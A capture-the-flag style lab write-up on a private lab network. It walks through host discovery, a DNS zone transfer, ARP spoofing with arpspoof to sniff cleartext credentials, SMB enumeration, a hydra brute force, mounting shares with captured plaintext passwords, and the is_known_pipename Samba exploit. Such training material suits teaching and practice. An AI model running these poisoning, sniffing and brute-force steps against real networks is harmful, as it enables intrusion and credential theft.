POISONING & SNIFFING LAB
Welcome N1NJ10 , Today we will talk about sniffing & poisoning and how we can do this , tools , tactics , spoofing , ..
First we will see what our Nic cards IP’S
Hint : our scope in 172.16.5.0/24 range only and only on DNS,SMB service
ifconfig
As we see we can access 192.168.0.0/24 , 172.16.5.0/24 network but our scope in 172.16.5.0/24 range , Let’s make arp scan with 3 methods , First with arp-scan tool
arp-scan
Second Nmap tool
nmap -sn 172.16.5.* -T4 HINTS : -sn disable port scan , -T is Timing Templates to speed up the process and i choose 4 for more info
Last one is with netdiscover tool
netdiscover -r 172.16.5.0/24 -i eth1 -P HINTS : -r for the ip range to scan , -i to specify the Nic , -P to print suitable format
I tried many solution but fails every time i checked Wireshark also but with no useful result
At the end i found this is a global issue you can solve it from here
Finally i discover that i can make an arp scan with netdiscover with the NIC only
Fine , Let’s make a port scan to see what services run on them , i used nmap again
nmap -Pn --disable-arp-ping -T4 -n -p53 -sT -sU 172.16.5.1,6,5,10HINTS : -Pn for disable the ping , — disable-arp-ping to disable Neighbor Discovery , -T4 , -n never resolution for DNS, -p for specify ports , -sT for tcp scan , -sU for udp scan
Why i use tcp full scan , udp scan ?
cuz DNS can work in both tcp and udp
Ok it seems 172.16.5.10 is a dns server , Let’s use dig to ask 172.16.5.10 about the other domains that existence in our network
dig @172.16.5.10 -x IP +nocookie -t anyHINTS : @IP this is the dns server ip to ask , -x the ip to ask about , +nocookie sent the packet with blank cookie fields, -t to ask about the query type i put it any to ask about all types
Fine , I found 3 domains , It seems that all of them have the same sportsfoo.com
Ok we can make a Zone Transfer query about it
dig @172.16.5.10 sportsfoo.com -t AXFR +nocookie +noall +answer HINTS : AXFR to make transfer zone
What ! , ftp,intranet.sportsfoo.com , has a different network 10.10.10.6 can we access it
Fine we can access it , Let’s show how we reach it with traceroute
Ok , Let’s see what all network we can reach
ip route show 
With this informations we can draw our topology of this network
Fine , Now we know the topology we can sniff
Let’s start with 172.16.5.5 and 172.16.5.1 , I prefer to use arpspoof for this mission
arpspoof -i eth1 -t 172.16.5.6 -r 172.16.5.1HINTS : -i for specific NIC , -t our target IP , -r the ip we wanna to spoof his mac , you should open second terminal and write the same command but reverse the ips
Note : you should activate the ip_forward to make this work
And use driftnet also to see if pictures are sent
And open wireshark to analysis the packets
After analysis it i found this credentials
Repeat the last 3 steps to the all IP’s arpspoof , driftnet and open wireshark to analysis the packets
So i found this packets
Ok it seems we find good credentials to access webpage
It seems we have ftp credentials also
Http again !
It seems we have many http credentials to use 😅
Again !
well , smb is good sign
Now it seems 172.16.5.10 have a SMB server
Ok let’s scan it
nmap -T4 -sS -Pn --disable-arp-ping -n 172.16.5.10
We find that it realy have smb let’s try to find more informations with enum4linux tool
enum4linux -a 172.16.5.10 ┌──(rootkali)-[~] ┌──(rootkali)-[~] └─# enum4linux -a 172.16.5.10 130 Starting enum4linux v0.8.9 ( http://labs.portcullis.co.uk/application/enum4linux/ ) on Thu May 11 14:19:16 2023
========================== | Target Information | ========================== Target ……….. 172.16.5.10 RID Range …….. 500–550,1000–1050 Username ……… ‘’ Password ……… ‘’ Known Usernames .. administrator, guest, krbtgt, domain admins, root, bin, none
=================================================== | Enumerating Workgroup/Domain on 172.16.5.10 | =================================================== [E] Can’t find workgroup/domain
=========================================== | Nbtstat Information for 172.16.5.10 | =========================================== Looking up status of 172.16.5.10 No reply from 172.16.5.10
==================================== | Session Check on 172.16.5.10 | ==================================== Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 437. [+] Server 172.16.5.10 allows sessions using username ‘’, password ‘’ Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 451. [+] Got domain/workgroup name:
========================================== | Getting domain SID for 172.16.5.10 | ========================================== Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 359. Domain Name: EXPLOITLABS Domain Sid: (NULL SID) [+] Can’t determine if host is part of domain or part of a workgroup
===================================== | OS information on 172.16.5.10 | ===================================== Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 458. Use of uninitialized value $os_info in concatenation (.) or string at ./enum4linux.pl line 464. [+] Got OS info for 172.16.5.10 from smbclient: Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 467. [+] Got OS info for 172.16.5.10 from srvinfo: SAMBA-EXPLOIT Wk Sv PrQ Unx NT SNT samba.exploit.lab platform_id : 500 os version : 4.9 server type : 0x809a03
============================ | Users on 172.16.5.10 | ============================ Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 866. index: 0x1 RID: 0x3e8 acb: 0x00000010 Account: admin Name: Desc: index: 0x2 RID: 0x3e9 acb: 0x00000010 Account: almir Name: Desc:
Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 881. user:[admin] rid:[0x3e8] user:[almir] rid:[0x3e9]
======================================== | Share Enumeration on 172.16.5.10 | ======================================== Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 640.
Sharename Type Comment — — — — — — — — — — - technology Disk finance Disk IPC$ IPC IPC Service (samba.exploit.lab) SMB1 disabled — no workgroup available
[+] Attempting to map shares on 172.16.5.10 Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 654. //172.16.5.10/technology Mapping: DENIED, Listing: N/A Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 654. //172.16.5.10/finance Mapping: DENIED, Listing: N/A Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 654. //172.16.5.10/IPC$ [E] Can’t understand response: NT_STATUS_OBJECT_NAME_NOT_FOUND listing \*
=================================================== | Password Policy Information for 172.16.5.10 | ===================================================
[+] Attaching to 172.16.5.10 using a NULL share
[+] Trying protocol 139/SMB…
[+] Found domain(s):
[+] SAMBA-EXPLOIT [+] Builtin
[+] Password Info for Domain: SAMBA-EXPLOIT
[+] Minimum password length: 5 [+] Password history length: None [+] Maximum password age: 37 days 6 hours 21 minutes [+] Password Complexity Flags: 000000
[+] Domain Refuse Password Change: 0 [+] Domain Password Store Cleartext: 0 [+] Domain Password Lockout Admins: 0 [+] Domain Password No Clear Change: 0 [+] Domain Password No Anon Change: 0 [+] Domain Password Complex: 0
[+] Minimum password age: None [+] Reset Account Lockout Counter: 30 minutes [+] Locked Account Duration: 30 minutes [+] Account Lockout Threshold: None [+] Forced Log off Time: 37 days 6 hours 21 minutes
Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 501.
[+] Retieved partial password policy with rpcclient:
Password Complexity: Disabled Minimum Password Length: 5
============================= | Groups on 172.16.5.10 | ============================= Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 542.
[+] Getting builtin groups:
[+] Getting builtin group memberships: Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 542.
[+] Getting local groups:
[+] Getting local group memberships: Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 593.
[+] Getting domain groups:
[+] Getting domain group memberships:
====================================================================== | Users on 172.16.5.10 via RID cycling (RIDS: 500–550,1000–1050) | ====================================================================== Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 710. Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 710. Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 710. Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 710. Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 710. [I] Found new SID: S-1–22–1 Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 710. Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 710. [I] Found new SID: S-1–5–21–2476325587–2202151648–2882393862 Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 742. [I] Found new SID: S-1–5–32 [+] Enumerating users using SID S-1–22–1 and logon username ‘’, password ‘’ Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 834. Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 834.
============================================ | Getting printer info for 172.16.5.10 | ============================================ Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 991. No printers returned.
enum4linux complete on Thu May 11 14:20:11 2023
It seems that we have null session here , Let’s identify with smbclient command
smbclient -L 172.16.5.10
Pingo , Now we know that we have null session here we missed one thing it’s valid credentials yes , Let’s use the credentials we previous found and use hydra to brutefroce on the smb server
hydra -L Users.txt -P pass.txt smb://172.16.5.10
Ok we are good to run psexec from metasploit and put our arguments
Note : for more informations you can see this writeup or this site
We fail , I search about this issue but i understand this is not an issue i read the exploit code and i find this
So i understand that all credentials we found are not administrator credentials
After searching for a while i found that i can exploit it with is_known_pipename() exploit
Note : read this resources then continue how-to-mount-a-windows-samba-windows-share-under-linux , is_known_pipename , metasploit-6-smb-encryption-error-fixing
First , Let’s test that our credentials have access on the smb server
We are good to mount this finance , technology with admin , almir
mount -t cifs -o user=almir,password=Corinthians2012,rw,vers=1.0 //172.16.5.10/finance ./N1NJ10Note : make a dir to mount on it
This time with technology dir
mount -t cifs //172.16.5.10/finance ./N1NJ10 -o rw,vers=1.0,user=admin,password=et1@sR7!
Now we know that the is_known_pipename() exploit will work well , let’s see
We are in N1NJ10 😉
This LAB was full of information that I learned, and I personally hope that you have benefited from it
Now you finish N1NJ10 I hope you have benefited from this LAB, If any something doesn’t make sense you can reach me on social media
I enjoyed the LAB , and would post more future LABS and other security stuff in the future.
Last updated